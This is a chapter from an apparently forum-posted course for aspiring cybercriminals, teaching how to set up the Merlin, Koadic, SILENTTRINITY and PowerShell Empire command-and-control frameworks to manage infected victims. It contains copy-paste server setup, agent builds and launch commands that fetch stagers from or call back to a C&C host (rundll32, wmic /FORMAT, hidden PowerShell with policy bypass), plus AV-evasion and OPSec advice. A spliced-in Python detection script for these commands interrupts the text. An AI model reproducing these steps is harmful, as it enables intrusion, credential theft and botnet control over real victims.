Funshine's Tail of a RAT Ch.3 C&C
Chapter 3: Command and Control
This chapter is about getting to know the Command and Control (C&C) frameworks currently available to you and showing you how to use them. This chapter is NOT about making them FUD and getting these frameworks around AV as the overall goal is to build up your knowledge surrounding these tools.

It's very important to understand that C&C frameworks are meant for POST EXPLOITATION. This means you upload them to an infected computer after you already have access to it.


IMPORTANT

You must follow along exactly as everything is laid out in this course AND you need to use the same operating systems that I'm using when following along. That way no one has any fucking problems. I've chosen to use Ubuntu as a C&C server since most VPS, hacked servers, etc. allow easy deployment/installation of Ubuntu as an OS and I will also be using Windows 10 in a VM.

If you're following along thinking everything will work on your CentOS VM this is not the case. Follow along properly to avoid problems. Everything has been tested and the syntax is provided to you so you can copy/paste it all when going through everything without major difficulties.

In this course you'll be using Windows 10, Ubuntu VM, and Kali in a VM when following along with the examples later on. In this chapter we'll setup everything so we're all on the same page. You can use your main Windows computer if you choose to do so but I recommend downloading the Windows 10 ISO from the link below and creating a virtual machine out of it. That way you can isolate everything to that VM and not affect your main computer (if you use Windows) in case something goes to fuck on you.

If you're already a Windows 10 user, I'd recommend entering your product key when installing from the Windows 10 ISO so the copy is registered and you have the full capabilities of Windows in a VM. That way you can feel confident that the Windows 10 you're working with is exactly like the targets you'll be going after. If you do not have a Windows 10 activation key then either go buy a copy of Windows 10 or use the trial version from the link below while following along.



Target computer - Windows 10 VM fully updated with AV turned off!
C&C server - Ubuntu VM

Windows 10 download link:
https://www.microsoft.com/en-us/software...ndows10ISO

Ubuntu download link:
https://ubuntu.com/download/desktop

Our target computer will be the fully updated Windows 10 VM and we'll be using Ubuntu in a VM to install our Command and Control (C&C) tools.

Before we continue, please disable Windows Defender (WD). Disabling WD is ideal when you're first using these tools so you get a handle on the horse before going up against WD, or any other AV for that matter, by yourself. Please turn off WD or you'll encounter issues when using these tools.

It's important to note that you cannot expect any of these frameworks to bypass AV/WD right out of the box. You will need to customize all payloads prior to deploying any of them onto a Windows 10 computer running Windows Defender with its default settings.

The point of learning Command and Control frameworks is to get you familiar with these frameworks and to understand why it's important to know how to edit the code templates to bypass WD on your own. Sometimes this can be as simple as changing a few strings within the code but don't be fooled as this can be a trial and error type of process leading to a time consuming adventure.



Alright, it's assumed you have Windows 10, Ubuntu, and Kali installed in a VM moving forward. Let's go ahead and start our Windows 10 VM and update everything on it before continuing. Once you have fully updated your Windows 10 VM we can then disable Windows Defender.



Disabling Windows Defender
In your Windows 10 VM go to the search bar within the taskbar and search for "Windows Security". Click on "Virus & Threat protection". Under "Virus & Threat protection settings" click on "Manage Settings" to be presented with the screen as seen in the screenshot below.


Now turn OFF all of those (4) settings so your screen looks like mine in the screenshot below.


Great! Now we're ready to move forward to test these tools.

Also, it's a good idea to take a snapshot of your updated Windows 10 VM so you can revert back to it when going through each tool for the first time. As always, use a fresh VM when testing out each tool so nothing gets fucked along the way.

Alright let's get at it.


Command and Control (C&C)


Command and Control (C&C) goes hand in hand with most RATs and other strains of malware available out there these days. In this chapter we're going to explore what a C&C server is and then we'll setup most of the C&C frameworks available today which are also widely used by other APTs across the world. It's important to note that C&C frameworks (Metasploit, Merlin, Koadic, PowerShell Empire, etc.) are just that, they're frameworks that are meant for you to build upon. These C&C frameworks take care of most of the heavy lifting such as communications, encryption, plug-ins, templates, etc. but most of the modules available are already detected by AV.

Do not solely rely on these frameworks to work out of the box on an updated Windows 10/11 computer. Some will function as expected but most of these frameworks will require some tweaking (which we'll get into later on) to evade AV.

We'll briefly touch on C&C basics and then go through each C&C framework one by one. There are plenty more C&C frameworks out there but I'm focusing on the ones that are widely used and available to most.

Alright let's get into the basics.

Command and Control is also known as C&C and C2 but we'll be using the term C&C throughout this course. Hackers use these servers to maintain communications with all the compromised computers they have access to across the world so they're much easier to manage. The C&C server constantly checks in with the infected computers, which gives us a dashboard showing our full inventory: how many people are infected, the type of each host, and the locations of all our infected victims.

Imagine having 1000s of infected computers and needing to log into each one to execute a single command. How fucking annoying is that? (It was.) By using C&C servers we can have all our infected victims connect back to (1) server so we can issue commands to the masses. Simple shit, yes?

Once the malware executes on a computer the C&C server can be used to command it to duplicate, spread, execute specific commands or update itself. This is all controlled by the attacker (you). Once a computer has been infected it sends a signal back to the C&C waiting for further commands or can upload content back to it for you so you're able to view it later on. You can then take control of the infected computer in much the same way that tech support staff might assume control of your computer while fixing a problem. The computer then becomes a "bot", "slave", or a "zombie" under your control. There are so many terms for infected computers so pick the one you think is cool.

I'm more of a bot person but you guys do you.



Anyways, this all makes sense. Right? Once we infect a specific computer we want a way to communicate directly with that computer to do our bidding, whether that is displaying a prompt to the victim, launching a file, extracting online credentials, or downloading and installing other pieces of malware (ransomware, adware, etc.).

C&Cs are almost always hosted in the cloud, on hacked servers, VPS, VPN with port forwarding, etc. but have also been known to use social media platforms, Twitter, Telegram, IRC, etc. to communicate with compromised systems.

One of the reasons you want to use a C&C server is to distance yourself from the infected computer directly by having the infected computer connect back to your C&C. You can host these C&C servers anywhere and it's best to host them on a VPS and connect into them via SSH over Tor for OPSec precautions. As always keep OPSec in mind and don't have your victims connect back to you directly or connect directly with the C&C as this would be silly.

When/if you have infected a lot of people you want to maintain access to those computers with ease and be able to issue commands to all infected computers at once if needed. C&C servers make it very easy to manage a large number of infected computers at once and are required in today's day and age if you plan on infecting many people.

The thing that people get all fucked up about when it comes to using C&C frameworks is that these frameworks are meant to be deployed AFTER you've compromised someone and already have them infected with your RAT/XYZ malware.



There are many C&C frameworks out there but we're going to focus on the ones that have been used by other cybercriminal organizations, government hackers, and nation state actors so we can install and deploy them as we see fit.

If government hackers and other cybercriminal gangs are using these tools then they're good enough for us too.



Now, before we continue it's good to know how to use each of these tools separately. It can be overwhelming when trying to learn these tools for the first time since they have different syntax, requirements, commands, etc. so before we continue you need to have a solid foundation on how to use these tools interchangeably.

The C&C frameworks available today are all different in their own right but they all have similar usage/syntax and navigation commands. What I mean is once you've learned how to use one C&C framework you'll feel comfortable and confident in using them all interchangeably.

In order to feel comfortable you'll need to get some experience with using these and the best tool to help build a solid knowledge foundation in C&C frameworks is Metasploit. Getting comfortable with the Terminal, navigating the command line interface (CLI), search function, setting it up, adding hosts, etc. will help you greatly when dealing with the other C&C frameworks since they're all somewhat similar to use and navigate around with.

Before continuing you must read the textbooks in the link below and get comfortable with using Metasploit, focusing specifically on using the syntax and navigating within the Metasploit console. It should be noted that if you're going to practice with Metasploit then you need to disable all AV settings on your Windows/macOS test computers so your payloads will function without difficulties. If you don't disable the AV then this exercise is useless. The point is to get familiar with these tools so don't worry about getting them past AV quite yet but instead just focus on getting comfortable using it properly. Once you have the basics down with some experience behind you we can expand on that.



You can also order these textbooks online so you have the physical copy at your disposal if you choose to do so which is a Google search away.

Do this now. Once you've read through those books you can continue on in this course.

When you've read the required textbooks and feel comfortable using Metasploit scroll down to continue.



Command and Control (C&C) Frameworks

Metasploit


We're not going to go into much detail into how to use Metasploit since you should've already gone through Metasploit on your own and read through the related textbooks provided. It's an excellent C&C framework but it's used so much these days that most, if not all, of the default payloads will be flagged by AV. We'll get into how to make them bypass AV in the Evasion chapter but for now it's assumed you're familiar with the Metasploit console, navigating within it, and using some of the payloads/modules.

Since you should be familiar with how to use this tool we can move on to the other well-known C&C frameworks available, which function in much the same way and should be easy to pick up and use.


Merlin


https://github.com/Ne0nd0g/merlin

Merlin is a cross-platform post exploitation Command & Control server and agent written in the Go programming language. Merlin is still pretty new in its development so you might experience some hiccups and bugs along the way but this framework is an excellent addition to your arsenal. It can run on Linux, Windows, and pretty much any platform supported by the Go runtime. This framework consists of a server (the C&C) and an agent (the file used to infect people), which can be a regular executable (.exe) or a .DLL file.

Before we use Merlin we need to setup our C&C server in our Ubuntu VM and install the Golang environment so we're able to customize the agent and add post exploitation modules to it as needed.


Open up Terminal in your Ubuntu VM and type:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo add-apt-repository ppa:longsleep/golang-backports
sudo apt update && sudo apt-get install golang-go make gcc-mingw-w64 net-tools git p7zip-full -y
sudo wget https://github.com/Ne0nd0g/merlin/releas...nux-x64.7z
sudo 7z x -pmerlin -omerlin merlinServer-Linux-x64.7z
sudo chown -R $USER:$USER merlin
cd merlin/data/x509
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=infosecinstitute" -days 7
cd ~/merlin
git clone https://github.com/Ne0nd0g/merlin-agent
git clone https://github.com/Ne0nd0g/merlin-agent-dll

Next you will need to compile an agent so we can use that to deliver to our Windows 10 computer. Select the Windows syntax below to create yours or compile a different one for an OS of your choosing.

cd merlin-agent
make windows - Makes a Windows Merlin agent.
make linux - Makes a Linux Merlin agent.
make darwin - Makes a macOS Merlin agent.

You can find your agent files in the "~/merlin/merlin-agent/bin" directory. This is the file you'll need to get executed on someone's computer to infect them with.

If you wanted to use a DLL Merlin agent then you would:
cd ~/merlin/merlin-agent-dll
make - Makes the .dll file and places it into ~/merlin/merlin-agent-dll/bin/

If you wanted to execute the .dll file on the target machine you would:
In Windows command prompt type:
C:\WINDOWS\System32\rundll32.exe merlin.dll,Run https://Ubuntu-IP:443/



Before we execute the agent we need to setup Merlin C&C so it's listening for incoming connections in our Ubuntu VM.

In Terminal on the Ubuntu VM type:
cd ~/merlin
sudo ./merlinServer-Linux-x64




You should see the same screen as in the screenshot above which means the Merlin C&C server is active but we need to still setup a listener for it so your "agents" can connect back to it.

In the Merlin console type the following:
listeners
use https
set Interface <Your Ubuntu VM IP>
info
start


OK we have our listener setup listening on port 443. Now we need to copy the Merlin Agent that we created before which should be in your ~/merlin/merlin-agent/bin folder. If you're confused please scroll up to see how to make a Windows Merlin Agent.

Copy the "merlinAgent-Windows-x64.exe" to your Windows 10 VM any way you please. Personally, I spin up a quick webserver with python3 and use Microsoft Edge to download it from my Ubuntu VM but you do whatever you feel comfortable with.


On your Windows 10 VM type:
merlinAgent-Windows-x64.exe -url http://<Your Ubuntu server IP>:443



Once you have executed that command on your Windows 10 VM you should get a connect back to the Merlin C&C in your Ubuntu VM as seen in the screenshot below.



Now we can see our sessions, interact with the infected host, and go through the commands within Merlin to see what is what. Remember, some will work and some will not.

In the Merlin console type the following:
main
agent list
interact SESSION-ID
My example: interact 13c8bd9b-dc8e-4fa9-83d0-58c7cff8903d
info
ls

To see the full menu type "help".

If you're wanting to use the modules within Merlin type "main" and then "use module module_name". This is where knowing how to navigate Metasploit will come in handy since it's pretty much the exact same. You should be able to navigate this on your own and explore the modules within Merlin.




It's a good idea to go through the manual too if you plan to dive deeper into using Merlin!


One thing I should mention is that there is always a delay when issuing a command to the infected host so try not to flip your shit or send an absurd number of commands at once. Just be patient and remember not everything works 100% of the time.

Lastly, at the time when I was first preparing this course the Merlin agents were not detected by AV but it seems Windows Defender is picking them up now as of June 2022. Interestingly, macOS doesn't pick them up at all, so that helps if you have an iMac or MacBook to practice on.


Koadic


https://github.com/silocityit/koadic-1

Koadic C&C is a post exploitation C&C framework like other ethical hacking tools such as Metasploit and Empire. Koadic operates mostly by using Windows Script Host (WSH) to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way up to Windows 10+.

Koadic is strictly for Windows targets and nothing else.

Koadic makes it possible to deliver payloads completely in memory and uses cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Open up Terminal in your Ubuntu VM and type:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install make git net-tools python3-pip -y
git clone https://github.com/silocityit/koadic-1.git koadic
cd koadic
pip3 install -r requirements.txt
chmod +x koadic
./koadic



We'll use one of the many stagers within Koadic. You should've already learned about stagers if you read through the Metasploit resources but to sum it up, a stager is just a file dropped onto a victim machine to get a connection back to the C&C so you can execute XYZ commands. This is mostly done in memory on the target computer.

The stager we'll use in this example will be an ActiveX object embedded in an XML style sheet document.

In the Koadic console type:
use stager/js/wmic
info
set ENDPOINT test
run




On Windows 10 VM open up command prompt and type:
wmic.exe os get /FORMAT:"http://<Your Ubuntu VM IP>:9996:/test.xsl"

Trying to run wmic.exe with WD enabled will result in "access denied". Some people try to rename wmic.exe to something else to help bypass AV (used to work - not so much now) but remember these tools are post exploitation!

You can rename the file like:
copy C:\Windows\System32\wbem\wmic.exe misosoup.exe

misosoup.exe os get /FORMAT:"http://<Your Ubuntu VM IP>:9996:/test.xsl"

Once you've run that command on your Windows 10 VM you'll receive a "zombie" in your Koadic console as seen in the screenshot below.



We can then interact with it by entering "zombie" and the associated zombie ID number. In this example "Zombie 0" connected back so we'll interact with zombie 0 with the command "zombies 0" in Koadic console as seen in the screenshot below.



Once you have a zombie you can choose any of the available "implants" at your disposal with koadic which include obtaining passwords, phishing, pivoting, etc.







SILENTTRINITY


https://github.com/byt3bl33d3r/SILENTTRINITY

SILENTTRINITY is a modern, asynchronous, multiplayer and multiserver post exploitation C&C framework powered by Python 3 and .NET's DLR. This tool is still being worked on and is relatively new to most people out there so expect some problems and bugs as you use it, but it has much potential in my eyes.

This C&C framework utilizes Boo-Lang instead of the traditional PowerShell, Windows Script Host, etc.

This framework is great if you're working with other hackers/cybercriminals and want to play "multiplayer" on your targets and manage them as a group.


Open up Terminal in Ubuntu and type:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install make git net-tools pipenv python3-pip -y
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
cd SILENTTRINITY
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt


Now we need to setup the SILENTTRINITY server.
python3 st.py teamserver Ubuntu-IP PASSWORD
My example: python3 st.py teamserver 192.168.0.78 PASSWORD

Leave the SILENTTRINITY server window open and open a new Terminal window:
python3 st.py client wss://username:PASSWORD@Ubuntu-IP:5000

"username" can be changed to anything as this is what you would login with as if you were in a group. Each member could replace "username" with whatever they please to login and interact with the target(s).



In the SILENTTRINITY console type:
listeners
use https
set CallBackUrls TEST
set PORT 9000
start
list
stagers
use powershell_stageless
generate https





Copy the stager.ps1 to your Windows 10 VM any way you please. Personally, I spin up a quick webserver with python3 and use Microsoft Edge to download it from my Ubuntu VM but you do whatever you feel comfortable with.

On Windows 10 VM open up command prompt where you downloaded stager.ps1 and type:
powershell -ExecutionPolicy Bypass -Windowstyle Hidden -File ./stager.ps1

You will receive a connection back to your SILENTTRINITY console as seen in the screenshot below.
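As a defender's counterpart to the agent and stager launch commands shown in this chapter for Merlin (rundll32 with a DLL export and a URL), Koadic (wmic /FORMAT: pulling a remote .xsl, possibly from a renamed copy of wmic.exe) and SILENTTRINITY (powershell -ExecutionPolicy Bypass -WindowStyle Hidden), here is an added detection example that is not part of the original post or any of these projects: it runs three command-line rules plus a renamed-binary check over constructed process-creation records. The Sysmon Event ID 1 style field names, the 192.0.2.10 server address, the file paths and the rule names are all assumptions made for the example.

```python
import ntpath
import re
from typing import Dict, List

URL = r"""https?://[^\s"']+"""

# Each rule: a name, an optional pattern for the image (file) name, and
# command-line patterns that must ALL match for the rule to fire.
RULES: List[Dict] = [
    {   # Merlin DLL agent launch: rundll32 loads a DLL export and is handed the C2 URL
        "name": "rundll32_dll_export_with_url",
        "image": re.compile(r"rundll32\.exe$", re.I),
        "cmdline": [re.compile(r"\.dll\s*,\s*\w+\s+" + URL, re.I)],
    },
    {   # Koadic wmic stager: /FORMAT: fetches a remote .xsl. The image name is deliberately
        # not checked because the post shows wmic.exe being copied under another name.
        "name": "wmic_remote_format_stylesheet",
        "image": None,
        "cmdline": [re.compile(r"""/FORMAT:\s*["']?""" + URL, re.I)],
    },
    {   # SILENTTRINITY stager launch: policy bypass plus hidden window (long or short flags)
        "name": "powershell_bypass_hidden",
        "image": re.compile(r"(powershell|pwsh)\.exe$", re.I),
        "cmdline": [re.compile(r"-(executionpolicy|ep|exec)\s+bypass", re.I),
                    re.compile(r"-(windowstyle|w)\s+hidden", re.I)],
    },
]

# Utilities whose on-disk name should agree with the PE header's OriginalFileName.
WATCHED_ORIGINALS = {"wmic.exe", "rundll32.exe", "powershell.exe"}


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule this process-creation event trips (empty if benign)."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "")
    hits = [r["name"] for r in RULES
            if (r["image"] is None or r["image"].search(image))
            and all(p.search(cmdline) for p in r["cmdline"])]
    original = event.get("OriginalFileName", "").lower()
    if original in WATCHED_ORIGINALS and image != original:
        hits.append("renamed_system_utility")  # e.g. wmic.exe copied to misosoup.exe
    return hits


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only the events that trip at least one rule, with the rule names attached."""
    findings = []
    for e in events:
        hits = evaluate(e)
        if hits:
            findings.append({"CommandLine": e["CommandLine"], "rules": hits})
    return findings


# Constructed Sysmon Event ID 1 style records; 192.0.2.10 stands in for the C2 server.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"C:\WINDOWS\System32\rundll32.exe merlin.dll,Run https://192.0.2.10:443/"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": 'wmic.exe os get /FORMAT:"http://192.0.2.10:9996/test.xsl"'},
    {"Image": r"C:\Users\alice\misosoup.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": 'misosoup.exe os get /FORMAT:"http://192.0.2.10:9996/test.xsl"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -ExecutionPolicy Bypass -Windowstyle Hidden -File ./stager.ps1"},
    # Benign controls: the same binaries doing ordinary work must not fire.
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic.exe os get caption,version"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(", ".join(f["rules"]), "<-", f["CommandLine"])
```

The renamed-copy record trips two rules at once, which is the point of checking OriginalFileName alongside the command line: renaming the binary changes the image name but not the PE header or the argument pattern.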



Now we can use the sessions command to see our session.

In the SILENTTRINITY console type:
sessions
list


To make things easier, let's rename this session.

rename SESSION_ID NEW_NAME
list



Let's go ahead and check a simple example.

In the SILENTTRINITY console type:
modules
use boo/shell
set Command whoami
run Win

Remember that "Win" is what I renamed the session Name to.



Some things to note: if you try to use a stager on a port lower than 1000 and you did NOT run pipenv with a root account, it will not work. If you see something saying "permission denied" this is most likely why; change the port to 9000 or something like it. Some modules require an elevated prompt (mimikatz, etc.) so pay attention to which ones will work right away and which ones you'll need to elevate your privileges for.

There are other modules available and people contribute to the project from time to time but get familiar with it and see what floats your boat.



PowerShell Empire


https://github.com/BC-SECURITY/Empire
https://www.bc-security.org/blog


Empire is a post exploitation framework that includes pure-PowerShell Windows agents, Python 3.x Linux/OS X agents, and C# agents. This framework offers cryptographically secure communications and a flexible architecture. It also utilizes "Donut", which effectively executes payloads within memory on the target computer.

Empire implements the ability to run PowerShell agents without needing powershell.exe and has rapidly deployable post exploitation modules ranging from key loggers, Mimikatz, and adaptable communications to evade network detection which are all wrapped up in a usability-focused framework.

For Empire we'll use Kali in a VM to host it and a Windows 10 computer as our victim.

In your Kali VM type:
sudo powershell-empire server
Keep that window open and running.

In a new Terminal window type:
sudo powershell-empire client
uselistener http
set Port 9010
execute



Now we'll generate an executable.

In your Kali VM type:
usestager windows/cmd_exec
execute



In the screenshot above you can see where the Empire agent is located which we'll need to move over onto our Windows 10 VM. Once the Empire Agent is executed on your Windows 10 VM you'll get a connection back as seen in the screenshot below.



We interact with Agents by typing:
interact AGENT
My example:
interact 1VZ46XSA

Now we can load any modules we see fit and have them executed on our Windows 10 VM. Just like Metasploit you'll issue "usemodule" and then select the module you want to run on the target machine. Typing "options" once you've loaded the module will display what's needed before you execute it.

Alright, you should be comfortable installing, setting up, and practicing with the C&C frameworks talked about in this chapter. The point of all of this is to get yourself familiar with using these types of frameworks so you're comfortable using them but, more importantly, so that when any new frameworks/techniques get released you're ready to pounce. I want to point out that when these frameworks were first released their payloads were FUD for quite some time until Microsoft and every other AV out there picked them up, rendering most of the payloads detected. This is why you want to be on top of cyber security news and the newest tools being released, as this can make it much easier on you.

Since all these C&C frameworks are open source you're able to edit the modules, implants, etc. to your liking, which is exactly how you make everything FUD for your operations. We're not going to focus on how to do this right now but I want you to understand that if you're familiar with these tools, know a little about going through the source code to change a few things, follow everything cybersecurity related on whatever social media you use, and keep an eye out for 0-days/new tools being released, you'll be in a much better position when something new comes along. New tools are released all the time.

Always be ready to pounce on an opportunity because when a new exploit is released you'll have the knowledge to use it.

Being a cybercriminal at our level is about opportunity and timing, for the most part, depending on your skill level and how far you want to take it.

That being said many of the people reading this probably won't be at a level needed to go through the source code and edit everything to bypass WD. If this is the case then you need to accept your fate knowing what your max technical skill level may be and understand that you fall into the category of purchasing your cyber weapons (malware) for your operations which is totally OK too.

Now that you know what C&C frameworks are and the most common ones used today, let's get into the RAT community.